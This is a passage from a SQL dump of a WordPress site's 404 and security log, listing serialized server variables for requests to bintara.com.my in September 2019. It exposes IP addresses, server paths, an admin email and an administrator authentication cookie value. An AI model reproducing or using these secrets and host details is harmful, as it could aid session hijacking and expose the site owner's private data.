22:19:30',30805328,32613256,'https://bintara.com.my/?page_id=18',1,0,'223.206.243.12'),(26825,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.12\";s:11:\"REMOTE_PORT\";s:5:\"59579\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgAOzXwAkGgnPePZ3HD9gAAAEE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569194043.4638\";s:12:\"REQUEST_TIME\";s:10:\"1569194043\";}}','notice','2019-09-22 23:14:06','2019-09-22 23:14:03',31201248,33011512,'https://bintara.com.my/?page_id=18',1,0,'223.206.243.12'),(26826,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.12\";s:11:\"REMOTE_PORT\";s:5:\"59647\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgCczXwAkGgnPePZ3HELQAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569194611.9315\";s:12:\"REQUEST_TIME\";s:10:\"1569194611\";}}','notice','2019-09-22 23:23:33','2019-09-22 23:23:32',30807728,32620352,'https://bintara.com.my/?page_id=11',1,0,'223.206.243.12'),(26827,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3666E9B9-6636-409C-A7CD-36B9FEF7F8FB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgZcrp66oO1SlzUVT6J2gAAAck\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"52639\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgZcrp66oO1SlzUVT6J2gAAAck\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569200498.5737\";s:12:\"REQUEST_TIME\";s:10:\"1569200498\";}}','notice','2019-09-23 01:01:40','2019-09-23 01:01:39',31082216,32900040,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26828,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"325-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:178:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"325-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgclBvUhDgROhmDVGmSigAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgclBvUhDgROhmDVGmSigAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51207\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgclBvUhDgROhmDVGmSigAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569201300.6321\";s:12:\"REQUEST_TIME\";s:10:\"1569201300\";}}','notice','2019-09-23 01:15:03','2019-09-23 01:15:01',30731496,32542768,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26829,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9195A372-6D06-413C-862A-2DE44319418E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgcoGLkiuNLQQwjy5k6gwAAAMI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"64898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgcoGLkiuNLQQwjy5k6gwAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569201312.671\";s:12:\"REQUEST_TIME\";s:10:\"1569201312\";}}','notice','2019-09-23 01:15:14','2019-09-23 01:15:13',31081712,32896272,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26830,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"30031406-C800-4AF3-AB4A-2F62E61B1B54\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgffNgT8SLwZ2vcJZwPwAAAABU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgffNgT8SLwZ2vcJZwPwAAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569202044.904\";s:12:\"REQUEST_TIME\";s:10:\"1569202044\";}}','notice','2019-09-23 01:27:26','2019-09-23 01:27:25',31083976,32896368,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26831,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"465-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=20efbd90916fb2c0b8172e46e26f2b71\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"465-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYghb7p66oO1SlzUVT6MaAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYghb7p66oO1SlzUVT6MaAAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51497\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYghb7p66oO1SlzUVT6MaAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202543.0932\";s:12:\"REQUEST_TIME\";s:10:\"1569202543\";}}','notice','2019-09-23 01:35:44','2019-09-23 01:35:43',30766848,32579776,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26832,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:61:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/wp-login\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"337-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, 